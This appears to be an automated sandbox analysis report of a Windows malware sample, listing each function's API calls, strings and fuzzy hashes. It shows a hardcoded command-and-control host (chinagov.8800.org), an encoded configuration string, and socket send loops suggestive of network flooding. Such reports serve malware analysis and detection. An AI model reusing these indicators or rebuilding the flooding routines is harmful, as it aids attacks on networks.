                                • Opcode ID: 771db627bcd87f4cf892667a07cceb416aea59b5bf69d6e00a526e4c638fa208
                                • Instruction ID: ae78371e899d60bf5f5d828a76061139e061b110f9393b7dc49d63d24438a906
                                • Opcode Fuzzy Hash: 771db627bcd87f4cf892667a07cceb416aea59b5bf69d6e00a526e4c638fa208
                                • Instruction Fuzzy Hash: 3C81FAB2D012599BDB21DF95C9486DEBBB4BB05308F50C0BBD5497B2A1C7B84B88CF58
                                Function 00406DB0 Relevance: 65.1, APIs: 29, Strings: 8, Instructions: 379librarythreadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406DCA
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406DD3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 00406DE1
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406DE4
                                  • Part of subcall function 00406BD0: LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                  • Part of subcall function 00406BD0: 6CFC6DE0.KERNEL32(00000000), ref: 00406BE2
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                  • Part of subcall function 00406C10: 6CFC6DE0.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                • socket.WS2_32(00000002,00000002,00000000), ref: 00406E79
                                • sendto.WS2_32(00000000,?,-00000401,00000000,?,00000010), ref: 00406EC6
                                • Sleep.KERNEL32(00000014), ref: 00406ECD
                                • RtlExitUserThread.NTDLL(00000000), ref: 00406EDE
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00406F0A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406F13
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00406F21
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406F24
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00406F32
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406F35
                                • socket.WS2_32(00000002,00000001,00000006), ref: 00406F97
                                • connect.WS2_32(00000000,?,00000010), ref: 00406FA7
                                • send.WS2_32(00000000,?,00000800,00000000), ref: 0040702E
                                • Sleep.KERNEL32(0000000A), ref: 00407032
                                • RtlExitUserThread.NTDLL(00000000), ref: 0040703B
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,761E58A0,00000000,00000000,76F90F00), ref: 0040706E
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00407077
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 00407087
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040708A
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 00407098
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040709B
                                • sendto.WS2_32(00000000,?,0000100C,00000000,?,00000010), ref: 004071A3
                                • RtlExitUserThread.NTDLL(00000000), ref: 004071AB
                                • Sleep.KERNEL32(000001F4), ref: 00407210
                                • RtlExitUserThread.NTDLL(00000000,?,00000000), ref: 00407216
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ExitThreadUser$Sleep$sendtosocket$connectinet_addrsend
                                • String ID: GetTickCount$KERNEL32.dll$WS2_32.dll$WSASocketA$WSAStartup$closesocket$htons$setsockopt
                                • API String ID: 1875766515-3926040945
                                • Opcode ID: ca39cd4000dd52fb1d9514fc1105b4bdf8d10fdaecb33af4158a9940e6cff011
                                • Instruction ID: 108494642a65384e92ce671c93e0be5eb4aeb19d0da13a5ceb95eb50e5242d09
                                • Opcode Fuzzy Hash: ca39cd4000dd52fb1d9514fc1105b4bdf8d10fdaecb33af4158a9940e6cff011
                                • Instruction Fuzzy Hash: 6BB118716483446BE314EB64DC05FAF77E5EBC9704F01093EF645BB2D0DAB89904879A
                                Function 00408130 Relevance: 61.6, APIs: 23, Strings: 12, Instructions: 327libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00408176
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00408188
                                • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040819D
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004081AF
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004081C1
                                • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004081D6
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004081E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: %d.%d.%d.%d$($E$P$WS2_32.dll$WSASocketA$WSAStartup$closesocket$gethostbyname$gethostname$htons$setsockopt
                                • API String ID: 1029625771-3688028543
                                • Opcode ID: d5bec2df0a0943f906bf46e4146bb6c47795ba2453832fb3d4d13fc28c77d11d
                                • Instruction ID: 53d6d929515b9e91ab4b685de5499f61474fe8fa857c4809401ddf33aa41e7a7
                                • Opcode Fuzzy Hash: d5bec2df0a0943f906bf46e4146bb6c47795ba2453832fb3d4d13fc28c77d11d
                                • Instruction Fuzzy Hash: A1D16EB5D402699BDB20DBA4CD89FEDB7B5EF94304F0040AEE249B7290DBB459C08F59
                                Function 00406C50 Relevance: 57.8, APIs: 6, Strings: 27, Instructions: 99libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406C73
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406C84
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406C95
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: $ $.$E$F$GetSystemDirectoryA$I$KERNEL32.dll$P$\$\$\$a$g$i$i$lstrcatA$lstrcpyA$m$n$n$o$o$o$p$p$s
                                • API String ID: 1029625771-3412716298
                                • Opcode ID: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                • Instruction ID: 1cc97e3852dfcfcdc61d028ea0c2383468fb858139331ce9ede19e0ea5d9e28d
                                • Opcode Fuzzy Hash: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                • Instruction Fuzzy Hash: 0041E61114D3C19DE312DA799884A8FBFD55BB6608F481D9EF1C427293C2AAC64CC7BB
                                Function 0040336C Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 98stringlibrarynetworkCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00403389
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00403392
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                • 6CFC6DE0.KERNEL32(00000000), ref: 004033A0
                                • _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                • strstr.MSVCRT ref: 004033E0
                                • memset.MSVCRT ref: 004033F9
                                • strcspn.MSVCRT ref: 00403410
                                • strncpy.MSVCRT ref: 0040341B
                                • strcspn.MSVCRT ref: 0040342D
                                • atoi.MSVCRT(?), ref: 00403437
                                • socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                • connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadstrcspn$_mbscpyatoiconnectmemsetsocketstrncpystrstr
                                • String ID: EhETHRcLHRAXHREQEAkLEwsTQw==$WS2_32.dll$closesocket$htons
                                • API String ID: 2841553729-84791798
                                • Opcode ID: b0d02812e01bd494b323ff795dfcab75fceb7154f08fe877454a16fbfcbf3fe1
                                • Instruction ID: 6aa5ca56811b2828efdf987d7b23adbf84b4b011ef7c06a256cd014a8a3b1787
                                • Opcode Fuzzy Hash: b0d02812e01bd494b323ff795dfcab75fceb7154f08fe877454a16fbfcbf3fe1
                                • Instruction Fuzzy Hash: D931B871900218BBDB10ABB49D49FDF7A6CAF05314F104577F609F72E1DA785A448BA8
                                Function 0040588B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58sleeplibraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 00405898
                                • 6CFC6DE0.KERNEL32(00000000), ref: 0040589F
                                • Sleep.KERNEL32(000001F4), ref: 004058E2
                                • Sleep.KERNEL32(000001F4), ref: 00405926
                                • Sleep.KERNEL32(000001F4), ref: 00405961
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$LibraryLoad
                                • String ID: ADVAPI32.dll$SetServiceStatus
                                • API String ID: 3235702935-1924299548
                                • Opcode ID: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                • Instruction ID: a5c8a0c86872ce331e11fcaa3c45903c56c1e4641523fec5342e9324e04e0236
                                • Opcode Fuzzy Hash: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                • Instruction Fuzzy Hash: 6A1158B1121262DBFB105B16EE4CB573AA6F704319F00803AE544B62B2C7B90C54CF3E
                                Function 004050CA Relevance: 9.0, APIs: 6, Instructions: 25sleepsynchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 004050DB
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000407C,00000000,00000000,00000000), ref: 004050ED
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050FB
                                • CloseHandle.KERNEL32 ref: 00405107
                                • closesocket.WS2_32 ref: 00405113
                                • Sleep.KERNEL32(0000012C), ref: 0040511E
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                • String ID:
                                • API String ID: 964154963-0
                                • Opcode ID: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                • Instruction ID: a79ab9a2dfc38e3776cf33d79ac1821f4f8275b6afc8926fd1558f3327be2bb1
                                • Opcode Fuzzy Hash: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                • Instruction Fuzzy Hash: CAE0C972406260FBD3216BA1AE4DDAB3E68FB0A3A1F144235F359B50F5DB340854CBA9
                                Function 00405126 Relevance: 9.0, APIs: 6, Instructions: 25sleepsynchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202), ref: 00405137
                                • CreateThread.KERNEL32(00000000,00000000,Function_000048AA,00000000,00000000,00000000), ref: 00405149
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405157
                                • CloseHandle.KERNEL32 ref: 00405163
                                • closesocket.WS2_32 ref: 0040516F
                                • Sleep.KERNEL32(0000012C), ref: 0040517A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                • String ID:
                                • API String ID: 964154963-0
                                • Opcode ID: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                • Instruction ID: 597c19437f16af45fe4c7fafc924f242b911babb52725cfa5b12b60dc2fdca2e
                                • Opcode Fuzzy Hash: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                • Instruction Fuzzy Hash: D0E0C076406160BFD3216BA1EF4DD9B3E68EF0A361B044135F35AB44F5C6780454CBA9
                                Function 0040484F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32networkCOMMON
                                Download Yara Rule
                                APIs
                                • htons.WS2_32(00001F9A), ref: 00404861
                                  • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                  • Part of subcall function 00406C10: 6CFC6DE0.KERNEL32(00000000), ref: 00406C23
                                  • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                • connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                • closesocket.WS2_32(00000000), ref: 0040489A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadclosesocketconnecthtonsinet_addrsocket
                                • String ID: chinagov.8800.org
                                • API String ID: 2269069743-2288617695
                                • Opcode ID: 41718983f1c9e5c223780d873f69bff2d5abf28acc2154f537cf20909f978101
                                • Instruction ID: aa8867dea59f3e018d1c3fe77959f1df48631034d4a5c4a8dfe27a3f3de7d62f
                                • Opcode Fuzzy Hash: 41718983f1c9e5c223780d873f69bff2d5abf28acc2154f537cf20909f978101
                                • Instruction Fuzzy Hash: 5DF08235A002247AEB1067A49D0ABEE7668EF09764F104726F721BA1E1D7B84550879D
                                Function 00406C10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406C23
                                • inet_addr.WS2_32(?), ref: 00406C30
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadinet_addr
                                • String ID: WS2_32.dll$gethostbyname
                                • API String ID: 4063186387-1612545655
                                • Opcode ID: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                • Instruction ID: fa684150f8c7a78303bc788c4e7da3796caaeb6c4f1dce52f515438040d0683d
                                • Opcode Fuzzy Hash: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                • Instruction Fuzzy Hash: 2DE09A393042009BE3049B26FE48DAA3BE8DAC9722305407AF942E3260C334C8428A68
                                Function 00406BD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 16libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00406BE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: Defghi Klmnopqr Tuv$GetTickCount$KERNEL32.dll
                                • API String ID: 1029625771-1458725802
                                • Opcode ID: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                • Instruction ID: e2b8e24bfa267fa6e9ec36e760088df98f66f050865d098ef55141e691ac327e
                                • Opcode Fuzzy Hash: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                • Instruction Fuzzy Hash: 69D02272A802129BD30033BADF0FACA7AA99AC83553048037B084F24B4DF38C4404798
                                Function 004051E3 Relevance: 7.5, APIs: 5, Instructions: 34sleepthreadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 004051F9
                                • Sleep.KERNEL32(00000064), ref: 00405207
                                  • Part of subcall function 0040507D: time.MSVCRT(00000000), ref: 00405087
                                  • Part of subcall function 0040507D: localtime.MSVCRT(?), ref: 00405094
                                  • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                • atoi.MSVCRT(?,?), ref: 0040521C
                                • Sleep.KERNEL32(00000064), ref: 0040522D
                                • CreateThread.KERNEL32(00000000,00000000,00405126,00000000,00000000,00000000), ref: 0040523B
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateStartupThreadatoilocaltimetimewsprintf
                                • String ID:
                                • API String ID: 1855471192-0
                                • Opcode ID: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
                                • Instruction ID: 0daf81d4eef7f1fa0beb5b5478619bf314a177f2874e1709eaed204b22834378
                                • Opcode Fuzzy Hash: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
                                • Instruction Fuzzy Hash: 68F03776D00218AEE71067B0AD4EFBB776CEB08710F000066BA45F60D1D6749D548EB5
                                Function 00405182 Relevance: 7.5, APIs: 5, Instructions: 34sleepthreadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00405198
                                • Sleep.KERNEL32(00000064), ref: 004051A6
                                  • Part of subcall function 0040507D: time.MSVCRT(00000000), ref: 00405087
                                  • Part of subcall function 0040507D: localtime.MSVCRT(?), ref: 00405094
                                  • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                • atoi.MSVCRT(?,?), ref: 004051BB
                                • Sleep.KERNEL32(00000064), ref: 004051CC
                                • CreateThread.KERNEL32(00000000,00000000,004050CA,00000000,00000000,00000000), ref: 004051DA
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateStartupThreadatoilocaltimetimewsprintf
                                • String ID:
                                • API String ID: 1855471192-0
                                • Opcode ID: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
                                • Instruction ID: f150061eb18795c979dcc7452c8c87f20c1a6e1286e61ebe96203e18624e51ff
                                • Opcode Fuzzy Hash: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
                                • Instruction Fuzzy Hash: F3F030B6D0022CAEE71067B0AD4EFBB776CEB08710F000066BA45F60D1E6749D848EB9
                                Function 004067E9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56stringCOMMON
                                Download Yara Rule
                                APIs
                                • strcmp.MSVCRT ref: 00406731
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                • sprintf.MSVCRT ref: 004068CD
                                • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000001,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040693E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Table$??2@??3@_mbscpysprintfstrcmp
                                • String ID: %u Gbps$KVa7
                                • API String ID: 3420875952-2796686009
                                • Opcode ID: 6098c4a6c90d9ca05f699309847211eacf8128fdf5923c6fd41ae41f8db015e8
                                • Instruction ID: a7a8e1041bd709416f2cdac98afc023946ef9f584d3dcb890be07267fec2ea1a
                                • Opcode Fuzzy Hash: 6098c4a6c90d9ca05f699309847211eacf8128fdf5923c6fd41ae41f8db015e8
                                • Instruction Fuzzy Hash: 18210E70A005158BD72ECB04CE94BA9B3BAFB94309F0941FDE10EAB6E5D6356F918F44
                                Function 0040507D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: localtimetimewsprintf
                                • String ID: %04d%02d%02d
                                • API String ID: 1360778613-2607228566
                                • Opcode ID: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                • Instruction ID: 6ead3e3b7a45fc54b5a265f10b09fe02a5435c176a1f4316584398403dd6ae14
                                • Opcode Fuzzy Hash: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
